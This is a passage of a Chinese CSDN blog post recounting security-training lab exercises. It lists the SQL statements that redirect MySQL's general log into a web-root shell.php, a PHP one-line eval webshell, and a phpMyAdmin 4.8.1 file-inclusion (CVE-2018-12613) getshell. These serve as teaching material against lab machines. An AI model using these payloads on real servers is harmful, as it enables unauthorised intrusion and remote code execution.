2024年网安最新网络安全综合实训

于 2024-05-03 18:20:20 发布
阅读量784 收藏 17
点赞数 16
分类专栏: 程序员 文章标签: web安全 android 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84264583/article/details/138421426
版权
这篇博客详细介绍了多个网络安全实验,包括Web站点渗透测试、经典加密解密实例(凯撒、Vigenere、SM4、AES、DES、RSA)以及SQL Server的安全设置。实验涵盖了从利用PHPMyAdmin漏洞getshell,到不同加密算法的实现,再到SQL Server安全策略的配置。此外,还提供了网络安全面试题及学习资源,适合网络安全初学者和进阶者学习。
摘要由CSDN通过智能技术生成

5、因为以root权限登录了phpmyadmin且在步骤3已经通过php探针获取到了网站的绝对路径,所以接下来可以尝试利用日志文件来进行getshell。首先在sql处执行“SHOW VARIABLES LIKE ‘general%’”查看是否开启日志功能以及日志文件的保存路径

6、由上图可知,“set global general_log = “ON”;”开启mysql日志“setglobalgeneral_log_file=‘C://phpStudy//PHPTutorial//WWW//shell.php’;”将日志文件的存储路径改为站点根目录下的shell.php 文件。

7、之后再执行sql语句“select ‘<?php @eval($\_POST[1]);?>’”,向日志文件中写入php一句话木马。

8、之后在浏览器中访问mysql日志文件,shell.php。看到如图所示的界面表示shell写入成功。

9、使用蚁剑对webshell进行连接。(软件无法使用,下图为参照)

实验2 web站点渗透测试2

实验准备

根据平台提供的靶机网址访问网站首页(10.0.26.10),首页界面如下图所示。

实验过程

  1. 扫描目标站点目录,发现存在“www.zip”文件和phpmyadmin目录

2、下载“www.zip”文件,解压后发现为网址源代码文件。

3、打开config目录下的database.php文件。找到数据库连接的用户名和密码。

4、访问网站的phpmyadmin目录,使用在源代码中找到的数据库用户名和密码进行登录尝试。

5、登录成功后,发现phpmyadmin的版本为4.8.1,这个版本的phpmyadmin存在任意文件包含漏洞(CVE-2018-12613)。参考内容:https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-LFI-Exploit/6、利用CVE-2018-12613进行getshell。在SQL语句执行处执行<?php file\_put\_contents('shell.php','<?php @eval($\_POST[1]);?>');?>,这句话的含义为向shell.php文件中写入一句话木马。

6、通过浏览器开发者工具—application

<

最低0.47元/天 解锁文章
2401_84264583
关注
  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
视频教程-web渗透测试详细入门实践课程-kali/sql注入-渗透测试
weixin_28836857的博客
05-28 630
web渗透测试详细入门实践课程-kali/sql注入 2010从事网络技术...
网络安全综合实训
2301_79639443的博客
01-28 1097
实验1 web站点渗透测试1。
计算机系统基础实训三—AttackLab实验,2024网络安全开发突破20k有哪些有效的路径
2401_84140112的博客
04-09 667
3以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!**
web渗透实训
YY_0418的博客
04-17 154
实验心得
山东大学软件学院项目实训-创新实训-网络安全靶场实验平台(十四)
番茄炒蛋不加蛋!的博客
06-04 215
前言:本篇博客主要记录XSS漏洞的实现,包括反射型XSS漏洞、存储型XSS漏洞。跨站脚本(Cross-site scripting,简称为:CSS, 但这会与层叠样式表(Cascading Style Sheets,CSS)的缩写混淆。因此,跨站脚本攻击缩写为XSS)是一种网站应用程序的安全漏洞攻击。XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBS
2021-05-03网络安全实训
qq_53163821的博客
05-03 212
首先今天先在学校里面初步了解了网络安全的知识点: 通过局域网探索工具LanSee对所属局域网网段进行探查: 又通过AdvancedPortScanner 对所使用的目标主机进行扫描: 在利用御剑后台扫描工具对目标网址进行扫描,并来利用网站漏洞扫描工具AWS的web scanner功能对目标网址(对自己部署IIS web服务)进行扫描 在自己设置的靶站上上传木马文件及文件名,在利用中国菜刀,成功后截图是: 在了解ipconfig/all 命令 ,在自己电脑里面了解本机的配置的IP地址,.
计算机系统基础实训三—AttackLab实验,2024最新网络安全开发面经分享
最新发布
2401_83621136的博客
04-21 850
值得注意的是,上面两路完成任务的寄存器不能互换,因为从%eax到%esi这条路线上面的mov都是4个byte的操作,如果对%rsp的值采用这条路线,%rsp的值会被截断掉,最后的结果就错了。第六步,将%edx的内容传送到%ecx,movl%edx,%ecx的指令字节为:89 d1,所以这一步的gadget地址为: 401ba2+2=401ba4。第一步,获取到%rsp的地址,movq%rsp,%rax的指令字节为: 48 89 e0,所以这一步的gadget地址为: 401b86+3=401b89。
20216月国产数据库大事记
ToyaAkira00的博客
07-01 5926
本文整理了20216月国产数据库大事件和重要产品发布消息。 6月国产数据库大事记 6月1日,在数据库 OceanBase3.0 峰会上,OceanBase CEO 杨冰宣布首个时序数据库产品 CeresDB 正式商用。CeresDB 将为用户提供安全可靠的数据查询和存储管理服务,解决监控运维、物联网等场景中,时间序列数据的高吞吐、横向扩展等难题。 这是 OceanBase 完成 OLAP 和 OLTP 双重能力并行后,向数据管理领域多模方向迈出的第一步。 6月1日,蚂蚁集团自研数据库OceanBas
网络安全实训(2)
a147447622的博客
09-15 231
在vim编辑器中找数据需要在命令模式中进行/key_word 在光标之后找第一次出现的关键词按住n键会寻找下一个关键词:%s/key1/key2 所有的文档每行第一次出现的key1替换成key2:%s/key1/key2/g 所有的key1替换成key2:s/key1/key2 将当前行第一次出现的key1替换成key2:s/key1/key2/g 将当前行中所有的key1替换成ke...
10 个适合初学者的网络安全项目
leah126的博客
02-26 1858
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
实验吧 —— web完整渗透测试实验指导书(图片版)
烟敛寒林的博客
09-02 1272
web完整渗透测试实验指导书(图片版)
Web安全技术及应用——项目1 Web服务器平台安装与配置
m0_56948411的博客
09-25 752
本次实验安装和配置了Apache服务器、PHP和MySQL数据库,为下一次实验Web开发提供了运行测试环境。
【PHP注入02】PHP注入漏洞利用实验
Fighting_hawk的博客
02-27 3621
1. 获取网站相关的信息利用PHP漏洞;获取数据库相关内容利用SQL注入漏洞。 2. 掌握漏洞验证及利用的过程。 3. 掌握利用漏洞读写文件及建立后门的过程。
php html 入侵,PHP文件包含漏洞攻防实战(allow_url_fopen、open_basedir)
weixin_34223354的博客
03-21 599
摘要PHP是一种非常流行的Web开发语言,互联网上的许多Web应用都是利用PHP开发的。而在利用PHP开发的Web应用中,PHP文件包含漏洞是一种常见的漏洞。利用PHP文件包含漏洞入侵网站也是主流的一种攻击手段。本文对PHP文件包含漏洞的形成、利用技巧及防范进行了详细的分析,并通过一个真实案例演示了如何利用PHP文件包含漏洞对目标网站进行渗透测试,最终成功获取到网站的WebShell。1. PHP...
基于PHP网站登录验证漏洞攻击及修复办法演示系统-计算机毕业源码设计
计算机源码设计案例的博客
04-23 349
开发软件:Dreamweaver + Mysql 开发技术:PHP,HTML,DIV+CSS 在功能上要求可以进行SQL语句的实现,从而可以进行SQL注入漏洞测试,开发人员编写修复程序来对漏洞进行修复。本文首先利用PHP语言开发实现了具有登录功能和注册功能的网站。登录功能,用户在网站的登录界面输入用户名和密码进行身份的验证,进而登录网站,在数据库中的功能表现为SQL语句的查询功能;注册功能,用户输入用户名和密码进行用户身份注册,进而才可以在登录界面上进行登录,在数据库中的功能表现为SQL语句的添加功能。
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 3920
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006初,原名FCS,2007元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
实战:通过tp5.0.5漏洞入侵企业网站
weixin_44763740的博客
07-24 756
下一步就是使用蚁剑连接webshell,看到这里,大家都以为可以直接getshell了吧,但是命运就是这么捉弄人,明明已经将木马包含在日志中,并且有绝对路径,相关函数也没有禁用,这一切看起来都是那么顺利,可就是连接失败。后来我又尝试换冰蝎马,但是因上传做了字符串限制,只能用最简单的一句话木马,其余多一个字符串都会被截掉,那么会不会是编码器的问题呢?以上可知,木马已存在,且路径正确,那一定是连接出问题了。我是身上有点执念的,为了梦想也好,目标也罢,有时候,你不去较劲儿,永远不知道自己能改变什么。
实训学习Day3 web渗透实战
huilang041的博客
04-17 1036
的时候自动转成%3f,满足该版本软件的白名单条件不会被后台过滤掉,此时%253f/就会被认为是一个目录,从而include。但由于在linux中mysql数据库的日志与web目录的用户权限是分开的,我们此时还无法通过目录地址访问该日志文件。合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。
网安专业技能大赛:培养公安网络安全英才
自2019以来,这些大赛已成为网络安全领域人才培养的重要平台,对于公安院校网络安全人才的培养现状有着深远的影响。 首先,文章强调了网络安全在当今社会中的重要性,随着网络犯罪的日益复杂和多样化,公安院校...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值